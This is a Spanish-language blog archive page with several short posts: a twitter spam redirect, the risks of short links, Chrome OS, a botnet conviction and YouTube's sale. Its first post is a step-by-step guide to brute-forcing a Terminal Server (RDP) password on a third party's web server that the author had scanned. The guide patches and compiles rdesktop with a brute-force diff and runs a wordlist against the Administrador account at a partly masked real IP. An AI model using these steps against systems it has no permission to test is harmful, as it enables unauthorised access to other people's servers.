Archive for the ‘Otros’ Category

Cracking pass of MS Terminal Server

noviembre 10, 2010

Rdesktop for Terminal Server

Hace unas semanas escaneaba un Web Server y me sorprendí al ver que tenía muchos puertos abiertos, 110, 21, 22 25, 443, 3389, 80, 993, 995 realmente para publicitarse como una empresa sería y segura no creí que tenga un buen esquema de seguridad con muchos servicios y puertos abiertos en un mismo Server.

Decidí probar con el 3389 de Terminal Server para saber si soportaba conexión remota a través de mi conexión ADSL, pues si soportaba, solo hacía falta saber la contraseña.

Atacando al RDP MS Terminal Server usando Backtrack 4

1. Actualizamos y parchamos Rdesktop.

Descargamos:

Rdesktop 1.5
http://prdownloads.sourceforge.net/rdesktop/rdesktop-1.5.0.tar.gz

RDP Brute force patch r805
http://www.foofus.net/jmk/tools/rdp-brute-force-r805.diff

Creamos una carpeta para las descargas

mkdir rdesk

A continuación, descomprimimos.

tar -xvzf rdesktop-1.5.0.tar.gz
cd rdesktop-1.5.0

Parchamos rdesktop para que pueda hacer el ataque de fuerza bruta

root@bt:~/rdesk/rdesktop-1.5.0# patch -p1 -i rdp-brute-force-r805.diff
patching file Makefile.in
patching file configure
patching file orders.c
patching file orders.h
patching file rdesktop.c
patching file rdesktop.h
patching file rdp.c
patching file secure.c
patching file xkeymap.c

Compilamos e instalamos

./configure
make
make install

Ahora ya tenemos la nueva versión de rdesktop lista para hacer el ataque

2. Realizando el ataque

En la línea de comandos escribimos:

#rdesktop -n Administrador -p /ruta/wordlist.lst 72.28.xxx.xxx

Falso mensaje twitter vende viagra

abril 25, 2010

Un correo supuesto del soporte de twitter nos redirige a una pagina web de venta de viagra.

Al presionar el enlace, nos redirige a:
httx://kivaeast.com/midstream.html 

y este a su vez, redirige hacía la página web de venta de viagra:
httx://joincalm.com

Cuidado con esos enlaces cortos

marzo 12, 2010

Ahora que están de moda los sistemas de microblogging o mensajes cortos (twitter, facebook, etc) y el crecimiento del uso de los enlaces cortos me surgió una pregunta, acaso son seguros estos sistemas que acortan los enlaces, acaso estaré seguro de no acceder a algún enlace malicioso (autenticación).

Decidí buscar más información al respecto y grande fue mi sorpresa cuando iba encontrando algunos blogs que hablan del tema.

http://usemoslinux.blogspot.com/…/los-enlaces-cortos-esconden-peligros-de.html

http://www.elpais.com/articulo/…/20100121elpcibpor_7/Tes/

La cierto es que al hacer clic sobre un enlace corto no podemos saber el destino de éste, es un albur el destino, no sabemos si nos dirigirá a otro blog, alguna Web de noticias, o quizá y por qué no decirlo, a algún enlace malicioso conteniendo malware, este último es muy peligroso porque puede ser un software malicioso usado para hacer phishing y si así fuera sí que estamos en problemas.

Las costumbres actuales de los usuarios de twitter y facebook hacen que con total confianza presionen en cuanto enlace corto se publique en estas redes sociales, hay una gran probabilidad que dicho enlace haya introducido malware (que hace phishing) en tu computadora y el atacante sepa (haya robado) con seguridad tu contraseña de correo-e y tus nros de tarjetas de crédito. Esto es muy peligroso, si tiene acceso a tus contraseñas, tiene acceso a toda tu información de índole personal, a tus contactos en facebook, fotografías privadas, a las actividades que realizas en el día a día y ésto es muy preocupante; en mi país los delincuentes usan este tipo de información para extorsionar, chantajear y hasta secuestrar a sus víctimas.

===============================================
Uno de los gusanos más famosos de las redes sociales, KoobFace, utiliza Bit.ly cuando se envía a todos los contactos de su víctima, o publica en su Twitter que tiene un vídeo que puede verse en un enlace corto y que infectará a quien lo visite. Otro gusano, ZeuS, ha usado TinyURL para propagarse”.
===============================================

Como paliativo AVG tiene una aplicación que verifica los enlaces antes de acceder a ellos, aunque seamos realistas los virus actúan antes que los antivirus los detecten o tengan firmas digitales de ellos.

http://linkscanner.avg.com

Es bastante difícil ir contra la corriente pero no sería mala idea de iniciar una campaña para disminuir los ‘enlaces cortos’

Google lanzará un competidor para Windows

julio 14, 2009

Según informes de prensa en E.U., la empresa presentará dentro de poco un sistema operativo que tendría la mayoría de sus funcionalidades alojadas en Internet y no el PC de sus usuarios.

En una clara movida contra Microsoft, Google anunció formalmente que se encuentra trabajando en la creación de un sistema operativo atado a su navegador Chrome y que, en principio, estaría enfocado a dispositivos de bajo costo, como los netbooks.

En su blog, Google señaló que el programa se llamaría Google Chrome Operating System y “se enfocará en ofrecer velocidad, simplicidad y seguridad. Será un sistema operativo liviano y eficiente que llevará a la gente a Internet en pocos segundos”, afirmó Sundar Pichai, vicepresidente de producto de Google.

Los voceros dijeron al diario The New York Times que la primera versión del sistema operativo estaría lista para finales de año. Se entregará bajo el mismo modelo de licenciamiento abierto de Linux, es decir, que comunidades de desarrollo externas a la empresa podrán tomar ‘la receta’ del programa, modificarla y mejorarla para compartir sus avances con el resto del mundo.

A mediados del año entrante, según el diario estadounidense, saldrán a la venta los primeros netbooks con este sistema de Google.

En la actualidad Windows, de Microsoft, está presente en el 90 por ciento de los computadores del mundo. En octubre 22 se lanzará la versión 7 de dicho sistema, que reemplazará a la actual Windows Vista.

Según Google, su navegador Chrome ya cuenta con más de 30 millones de usuarios. Las aplicaciones de oficina, entretenimiento, seguridad, etc. del nuevo sistema funcionarán ‘en la nube’, es decir, en Internet.

Mayor información del anuncio del sistema operativo de Google en el blog de la compañía (en inglés):

http://googleblog.blogspot.com/2009/07/introducing-google-chrome-os.html

Fuente: www.eltiempo.com

 

<!–

lalalalallaal

–>

4 años de prisión por instalar malware

marzo 6, 2009

Un consultor de seguridad informática de Los Ángeles (Estados Unidos) ha sido sentenciado a pasar 4 años en una prisión federal por usar software malicioso que convertía a miles de ordenadores en zombies desde los cuales podía robar información.

El joven John Schiefer de 27 años recibió la sentencia el pasado miércoles tras haberse declarado culpable de los cargos el pasado mes de abril de 2008 de fraude informático. Los fiscales le acusaron a él y sus asociados de crear botnets, redes de ordenadores infectados con software para robar datos de esas máquinas o usarlas como medio para la propagación de spam.

Schiefer trabajaba como consultor para una empresa de publicidad holandesa que precisamente hacía uso de sus servicios para propagar anuncios de spam a través de esas redes de ordenadores zombies. Schiefer tendrá que pagar 19.000 dólares para compensar a Paypal y otras empresas afectadas.

Fuente: www.theinquirer.es

El retorno

enero 21, 2008

Tenía bastante olvidado este Blog así que hoy decidí re-conectarme y continuar posteando.
The return 

El Exito de YouTube.com

octubre 17, 2006

Chad Hurley y Steve Chen, los creadores de YouTube que lo iniciaron como un pasatiempo hace 20 meses en una pequeña oficina en California. Ahora acaba de ser vendido por la agradable suma de 1650 Millones de Dolares.

Los creadores señalan que el éxito de Youtube se debe a dos cosas, escuchar y tomar en cuenta las sugerencias de los usuarios, y al apoyo del publico por publicar sus videos.